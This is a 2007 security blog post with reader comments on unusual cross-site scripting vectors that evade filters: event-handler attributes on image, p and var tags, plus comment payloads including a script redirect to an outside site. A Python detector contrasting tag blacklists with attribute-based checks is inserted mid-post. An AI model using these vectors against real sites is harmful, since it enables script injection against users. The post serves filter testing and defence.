Unusual XSS vectors
Monday, 19 November 2007
I’ve been working on my Hackvertor script to include XSS fuzzing, which isn’t ready yet, but I thought you might be interested in a few interesting results I’ve found 🙂
First off, I’m sure you know you can use XSS in an img element, yeah? Well, did you know there’s also an image element as well? It can be used like this:-
<image src="" onerror="alert(/XSS/)" />
Pretty neat eh? It may get round some XSS filters. It’s not in RSnake’s cheatsheet after a quick check.
Next up, you can even inject JavaScript into paragraph tags or obscure HTML tags like the following:-
<p onmouseover=alert(/XSS/)>Some very long paragraph goes here.</p>
Or what about this:-
<var onmouseover=alert(/XSS/)>Some very long paragraph goes here.</var>
Many other tags are supported using this method. That is all for now; I hope you enjoyed this little post. I shall release my fuzzing research once the features have been completed in Hackvertor.
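The defensive lesson of the post is that a filter keyed on tag names (img, script, and friends) misses these vectors, while one keyed on attributes does not: the payload in every example above is an on* event-handler attribute, and it works on image, p, var or almost any other tag. Browsers also treat an `<image>` start tag as `<img>` at parse time, so a filter comparing the literal tag name never sees the name the browser acts on. The following is an added example, not code from the original post or from Hackvertor; it uses Python’s standard html.parser to contrast a hypothetical tag blacklist (NAIVE_TAG_BLACKLIST, an assumed list of the usual suspects) with an attribute-based check, run over constructed samples taken from the vectors on this page.

```python
"""Added example (not from the original post): attribute-based detection of
inline event handlers, contrasted with a naive tag-name blacklist.

Run it directly to see which samples each approach flags.
"""
from html.parser import HTMLParser

# Assumed blacklist of the kind a naive filter might use: it names the
# well-known vectors but not <image>, <p> or <var>.
NAIVE_TAG_BLACKLIST = {"script", "img", "iframe", "object", "embed"}

# Constructed samples: the first four are the vectors shown in the post and
# comments, the last one is benign markup that must not be flagged.
SAMPLES = {
    "image_onerror": '<image src="" onerror="alert(/XSS/)" />',
    "image_slash": "<image/src onerror=alert(1)>",
    "p_onmouseover": "<p onmouseover=alert(/XSS/)>Some very long paragraph goes here.</p>",
    "var_onmouseover": "<var onmouseover=alert(/XSS/)>Some very long paragraph goes here.</var>",
    "benign": '<p class="note">Hello <b>world</b></p>',
}


class TagCollector(HTMLParser):
    """Collects start-tag names, which is all a tag blacklist looks at."""

    def __init__(self):
        super().__init__()
        self.tags = set()

    def handle_starttag(self, tag, attrs):
        # html.parser already lower-cases tag names; self-closing tags
        # (<image ... />) reach here via the default handle_startendtag.
        self.tags.add(tag)


class EventHandlerFinder(HTMLParser):
    """Records every element carrying an on* attribute, whatever the tag is."""

    def __init__(self):
        super().__init__()
        self.findings = []  # (tag, attribute name, attribute value)

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            # Attribute names are lower-cased by the parser; the check is on
            # the attribute, so obscure or misspelt tag names do not matter.
            if name.startswith("on"):
                self.findings.append((tag, name, value))


def naive_blacklist_flags(html):
    """True if any blacklisted tag name appears in the markup."""
    collector = TagCollector()
    collector.feed(html)
    collector.close()
    return bool(collector.tags & NAIVE_TAG_BLACKLIST)


def find_event_handlers(html):
    """Return a list of (tag, attribute, value) for every on* attribute."""
    finder = EventHandlerFinder()
    finder.feed(html)
    finder.close()
    return finder.findings


def scan_samples():
    """Map each sample name to (blacklist verdict, attribute-based findings)."""
    return {
        name: (naive_blacklist_flags(markup), find_event_handlers(markup))
        for name, markup in SAMPLES.items()
    }


if __name__ == "__main__":
    for name, (blacklisted, handlers) in scan_samples().items():
        print(f"{name:16} tag-blacklist={blacklisted!s:5} on*-attrs={handlers}")
```

Note that this is a detector for review or logging, not a sanitizer: the robust fix is to parse untrusted markup and keep only an allowlist of tags and attributes (or to encode the output), rather than trying to enumerate the bad ones.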
No. 1 — November 19th, 2007 at 12:30 pm
Wow – the <image> issue is new indeed. The rest is just plain browser madness – Firefox in particular.
<image/src onerror=alert(1)>
Incredible… Nice find 🙂 I await the day when Hackvertor has an API with itching fingers 😉
No. 2 — November 19th, 2007 at 12:35 pm
Thanks Mario 🙂 I’ve registered a domain for Hackvertor and once I’ve finished the look-behind matching and completed the fuzzing features I’ll start work on an API, which should be cool 😀
No. 3 — November 19th, 2007 at 4:31 pm
Cool! I wrote a http://www.tssci-security.com/archives/2007/11/15/blacklisting-xss-filter-evasion-and-other-resources/ a couple days ago about using <img src="" onerror=alert(/xss/)> in a site review.. Didn’t even realize there was an <image> element that works the same.
I’m going to have to try the onmouseover attribute next time around.
Mario’s is a nice one too… I’m building up my own little cheat sheet as I go along. Perhaps XSS Cheat Sheet could use an update.
🙂
No. 4 — November 19th, 2007 at 5:11 pm
onwhatever 🙂
http://www.w3schools.com/dhtml/dhtml_events.asp
MSIE even features dozens of additional ones…
No. 5 — November 22nd, 2007 at 11:51 am
> It’s not in RSnake’s cheatsheet after a quick check.
But in his Book 😉
“Cross Site Scripting Attacks: Xss Exploits and Defense”
HTH
No. 6 — November 22nd, 2007 at 12:13 pm
@Domber
He should update his cheatsheet then 🙂
No. 7 — August 4th, 2008 at 12:37 pm
An XSS attempt 🙂
<script>window.location = 'http://www.reelic.za.net/'></script>
No. 8 — August 4th, 2008 at 12:37 pm
'>"><script>alert(0)</script>
No. 9 — August 4th, 2008 at 1:30 pm
@Reelix
1. You’d be getting an XSS on WordPress and not me.
2. You didn’t get XSS
3. This is boring
No. 10 — August 15th, 2008 at 8:23 am
Some filters are based on the HTML syntax: they remove all attributes like on*, remove some unsafe tags, and so on.
The filter is just like a browser, and it’s much safer.
No. 11 — January 6th, 2010 at 1:32 pm
<image src="" onerror="alert(/XSS/)" />